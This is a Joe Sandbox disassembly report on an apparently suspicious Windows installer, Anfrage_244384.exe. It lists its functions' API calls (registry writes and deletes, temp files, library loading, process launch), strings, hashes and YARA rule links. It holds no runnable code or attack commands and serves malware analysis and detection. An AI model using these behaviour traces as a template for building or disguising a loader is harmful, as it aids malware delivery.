Function 004060EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406105
wsprintfA.USER32 ref: 0040613E
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406152

Strings

UXTHEME, xrefs: 004060F7
%s%s.dll, xrefs: 00406138
\, xrefs: 00406116

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 22b859301be01545360faa7ed4cfae0610cf7599f3afabecce9a192d73219230
Instruction ID: f3b8c8f840e4a68c7bce26bfc9f978bd3a53690dd24d0c1e4954f7cf1b20607f
Opcode Fuzzy Hash: 22b859301be01545360faa7ed4cfae0610cf7599f3afabecce9a192d73219230
Instruction Fuzzy Hash: BEF0217054020AA7DB149B64DD0DFFB379CBB08305F14047AA587F50C2D5B8D5358B58

Function 004023D3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402411
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402431
RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246E
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F

Strings

C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp, xrefs: 00402422, 00402430, 00402444, 00402458, 00402463

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp
API String ID: 1356686001-612988758
Opcode ID: 16c11ee55e493c1f4cb55922a7a265c15d1edf48fbcc260bb9481044d91f603c
Instruction ID: 78945337bfecb372f974009004526856e4df2419c5d7c36b02de55c30b310c87
Opcode Fuzzy Hash: 16c11ee55e493c1f4cb55922a7a265c15d1edf48fbcc260bb9481044d91f603c
Instruction Fuzzy Hash: 842162B1E00208BEEB10EFA4DE49EAF7678EB54358F20403AF545B61D0C6B94D419B68

Function 00405A65 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405A79
GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405A93

Strings

"C:\Users\user\Desktop\Anfrage_244384.exe", xrefs: 00405A65
C:\Users\user\AppData\Local\Temp\, xrefs: 00405A68
nsa, xrefs: 00405A70

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Anfrage_244384.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3738529843
Opcode ID: 245b3c25697a366b20d072f4ae6f3df15c900acea65bebff5d6a318f0eee9b10
Instruction ID: 72edad6ec601b3e5bedbe0a956b09e0e85e9d1f351c5a8d1d7ddacf5062ef271
Opcode Fuzzy Hash: 245b3c25697a366b20d072f4ae6f3df15c900acea65bebff5d6a318f0eee9b10
Instruction Fuzzy Hash: DBF082363046187BDB108F55ED44B9B7B9CDFA1760F10803BFA44DA180D6B599548B58

Function 00402B0E Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402B2F
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B6B
RegCloseKey.ADVAPI32(?), ref: 00402B74
RegCloseKey.ADVAPI32(?), ref: 00402B99
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402BB7

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: ce3d45171df20cd5368556db4e0df27da4ec55921f16075ab1a00bf066d588a4
Instruction ID: 01bd3f518095735bd7fc58530e3e97865138d1262df332b424d450b53e5153fe
Opcode Fuzzy Hash: ce3d45171df20cd5368556db4e0df27da4ec55921f16075ab1a00bf066d588a4
Instruction Fuzzy Hash: 83117F31500108FFDF11AF90DE89EAB3B7DFB14345B00403AF905B11A0D7B8AE55AB68

Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE

GlobalFree.KERNEL32(00000000), ref: 10001768
FreeLibrary.KERNEL32(?), ref: 100017DF
GlobalFree.KERNEL32(00000000), ref: 10001804

Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2

Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB

Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572

Strings

, xrefs: 100017E5

Memory Dump Source

Source File: 00000000.00000002.2608477836.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2608425248.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2608498578.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2608545228.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Anfrage_244384.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60

Function 00401FFF Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 0040202A

Part of subcall function 00404FDC: lstrlenA.KERNEL32(0042A048,00000000,0041C020,762323A0,?,?,?,?,?,?,?,?,?,0040308E,00000000,?), ref: 00405015
Part of subcall function 00404FDC: lstrlenA.KERNEL32(0040308E,0042A048,00000000,0041C020,762323A0,?,?,?,?,?,?,?,?,?,0040308E,00000000), ref: 00405025
Part of subcall function 00404FDC: lstrcatA.KERNEL32(0042A048,0040308E,0040308E,0042A048,00000000,0041C020,762323A0), ref: 00405038
Part of subcall function 00404FDC: SetWindowTextA.USER32(0042A048,0042A048), ref: 0040504A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040203A
GetProcAddress.KERNEL32(00000000,?), ref: 0040204A
FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B4

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 180a3081fb3f78eb91f00a12e3d21899e8b163c30cc106c56dc37463dfcc7d01
Instruction ID: b783eae22080e2a76f4456b755c5680fa053b08e058d045f217a77597ec219f0
Opcode Fuzzy Hash: 180a3081fb3f78eb91f00a12e3d21899e8b163c30cc106c56dc37463dfcc7d01
Instruction Fuzzy Hash: 0F21C971A00225E7DB307FA48F49A5E7A746B44354F24413BF701B22D1DBBE4A42D66E

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 004058CE: CharNextA.USER32(?,?,0042BC70,?,0040593A,0042BC70,0042BC70,76233410,?,C:\Users\user\AppData\Local\Temp\,00405685,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058DC
Part of subcall function 004058CE: CharNextA.USER32(00000000), ref: 004058E1
Part of subcall function 004058CE: CharNextA.USER32(00000000), ref: 004058F5

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 004054A2: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054E5

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes
API String ID: 1892508949-737122785
Opcode ID: 41430e8041f5b825a25f6f7f5196f7741ab1efb3ce46360c30da8e6aa749b7db
Instruction ID: 816b54ed5d655ae39ec9af7653b37b3cb045aad08be9d120fc9ab2aeee17589e
Opcode Fuzzy Hash: 41430e8041f5b825a25f6f7f5196f7741ab1efb3ce46360c30da8e6aa749b7db
Instruction Fuzzy Hash: 4A110431608142EBDB317BB54D409BF2AB0DE96324B28493FE4D1B22E2D63D4942663E

Function 00404F50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404F7F
CallWindowProcA.USER32(?,?,?,?), ref: 00404FD0

Part of subcall function 00403FF4: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00404006

Strings

, xrefs: 00404F60

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 08716edfc016174e1d95566f9c20dbce6f1779ae15c64c490cb603040d3fbc74
Instruction ID: 957b128ff8c1be49c7c43d2eec533a56ef4d4953328fce41794b465c1d4f4089
Opcode Fuzzy Hash: 08716edfc016174e1d95566f9c20dbce6f1779ae15c64c490cb603040d3fbc74
Instruction Fuzzy Hash: C80184B160020AAFDF20AF51DD80A5B3B66EBC4755F15413BFF00751D1C77D8C62966A

Function 00405554 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C070,Error launching installer), ref: 0040557D
CloseHandle.KERNEL32(?), ref: 0040558A

Strings

Error launching installer, xrefs: 00405567

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 4fc3f2634484a51afe99368b6ee5adae76d461d8ba1d0850051e12a9b99b56ab
Instruction ID: 7a3dc1fb8a2ad91d62cd378edef27adb0088bf0f4d8ddc25e60ef95d811c5913
Opcode Fuzzy Hash: 4fc3f2634484a51afe99368b6ee5adae76d461d8ba1d0850051e12a9b99b56ab
Instruction Fuzzy Hash: 1AE04FB0600209BFEB109FA0ED45F7F77ACE700208F408531BD00F2150D77499088A7C

Function 004024F5 Relevance: 4.5, APIs: 3, Instructions: 46registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,000005B0,00000000,00000022,00000000,?,?), ref: 00402C00

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402527
RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 0040253A
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 8c59f9b8c0256cbe9bd71fe7ee3f101d5ae56516e7ddf643f02568347a4a43af
Instruction ID: 2b577d6a6ed12fdd73b92825448b087f6304f6a5da561ecb1c8b28b09130acc9
Opcode Fuzzy Hash: 8c59f9b8c0256cbe9bd71fe7ee3f101d5ae56516e7ddf643f02568347a4a43af
Instruction Fuzzy Hash: EC01DF71A00201EFE7119F65AE88ABF7A7CDF40394F20003FF045A61C0D6B84A459669

Function 00405CAA Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,00405EEF,00000000,00000002,?,00000002,?,?,00405EEF,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405CD3
RegQueryValueExA.KERNELBASE(?,?,00000000,00405EEF,?,00405EEF), ref: 00405CF4
RegCloseKey.ADVAPI32(?), ref: 00405D15

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 736db648b4ac55722d45c6321a86d011e73f53958cb133121ff9030ed915e9ad
Instruction ID: fa75aaf4fea41e3e7414327fe65dbec21031f90634d69430c1a7616152fbf627
Opcode Fuzzy Hash: 736db648b4ac55722d45c6321a86d011e73f53958cb133121ff9030ed915e9ad
Instruction Fuzzy Hash: 35015E7114020AEFDF118F64ED48EDB7FACEF14354F00403AF94596160D235D964CBA5

Function 100027E8 Relevance: 3.2, APIs: 2, Instructions: 156COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000), ref: 100028A7
GetLastError.KERNEL32 ref: 100029AE

Memory Dump Source

Source File: 00000000.00000002.2608477836.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2608425248.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2608498578.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2608545228.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Anfrage_244384.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95

Function 00402483 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,000005B0,00000000,00000022,00000000,?,?), ref: 00402C00

RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B3
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: d850bb980ad2883e227a71fb5280a52a3d81dc84fb8262d842fcbb69d7bdd2c1
Instruction ID: e91595cf43b51ebfb07aaa5ef395d3110d573e6c70d377c823b3106e64d9cd55
Opcode Fuzzy Hash: d850bb980ad2883e227a71fb5280a52a3d81dc84fb8262d842fcbb69d7bdd2c1
Instruction Fuzzy Hash: 9611E371A00205EFDB20CF60CA985AEBBB4AF10359F20443FE042B72C0D2B88A85DB19

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 17f8aef753e543b5ee650811f3a930ee6678dad556f6ee04a93732104315d6e9
Instruction ID: 86e07a789f87ce41f875dd809bfef8a2c44af10f02abad90d5e7e67c6ed0449b
Opcode Fuzzy Hash: 17f8aef753e543b5ee650811f3a930ee6678dad556f6ee04a93732104315d6e9
Instruction Fuzzy Hash: 6C01F4317242109BE7199B399D04B6A3698E710719F54823FF852F61F1D678DC038B4C

Function 00402377 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,000005B0,00000000,00000022,00000000,?,?), ref: 00402C00

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402396
RegCloseKey.ADVAPI32(00000000), ref: 0040239F

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: ff0e75e6dbc0e2437b530ccf3d824c87c8e4f35292bcf7b0d6f82daa0a276924
Instruction ID: e00662a738be89c3cfbff0ecf138b3afd2420e904d99b7d2952bcd9b842c0734
Opcode Fuzzy Hash: ff0e75e6dbc0e2437b530ccf3d824c87c8e4f35292bcf7b0d6f82daa0a276924
